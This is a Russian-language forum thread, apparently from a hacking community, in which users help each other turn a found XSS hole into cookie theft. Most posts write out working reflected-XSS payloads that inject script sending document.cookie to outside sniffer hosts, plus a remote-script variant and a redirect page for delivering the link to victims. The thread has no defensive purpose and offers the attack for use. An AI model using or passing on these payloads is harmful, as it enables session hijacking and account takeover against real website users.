короче нашёл на сайте хсс и вот хочу спросить,как ссылку сделать?я так сделал,правильно ли? site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;</script> и ещё,я так понял что там где site.com надо ставить ссылку той страница где я нашёл ХСС,так ли это?
да ты все верно понял но мне кажется лутше делай так: 1) site.com"><script%20src=http://xss-xss.nm.ru/js.js></script> js.js img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie; 2) Или залей на какуюто страницу лутше index.htm <script language="JavaScript"> document.location.href="http://site.com'><script%20src=http://xss-xss.nm.ru/js.js></script>"; </script> кажысь так все у тебя получится
а смотрите,я сделал себе снифф на ачате http://antichat.org/s/***/log.php какой адресс замой картинки то? и ещё,я вот ищу хсс спомощью проги Acunetix 4 и он находит хсс в "/",возможно ли её осуществить,если да то как?
попробуй так: site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+escape(document.cookie)</script>
Ребят скажите почему это не работает: Вызов из ява-скрипта : <script> img = new Image(); img.src = "http://адрес/sniffer.gif?"+document.cookie; </script> пробовал так, создал файлик html, его содержание: <br> <br> <a href="http://google.com">google</a><br> <script> img = new image(); img.src = "http://адрес/sniffer.gif?"+document.cookie; </script> <br> На снифер ничего не приходит, почему скажите пожалуйста...Читал много, все одно и тоже, но не фига...снифер Kanickа...
